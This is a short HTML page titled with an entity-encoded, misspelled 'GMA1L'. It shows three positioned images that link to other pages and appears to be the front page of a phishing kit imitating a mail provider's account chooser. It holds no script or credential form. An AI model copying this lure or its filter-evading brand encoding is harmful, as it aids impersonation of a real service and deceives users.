
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>G&#77;&#65;1L, </title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>

</head>
<body>

<img src="g_files/which1.png" alt="" style="position:absolute;left:40px;top:20px;width:center;height:center;" align="" border="0"></a>

<a href=" GC.htm"> 
<img src="g_files/which 2.png" alt="" style="position:absolute;left:65px;top:170px;width:center;height:center;" align="" border="0"></a>

<a href=" GP.html"> 
<img src="g_files/which3.png" alt="" style="position:absolute;left:73px;top:282.5px; width:center;height:center;" align="" border="0"></a>

</form>
</div>

</body></html>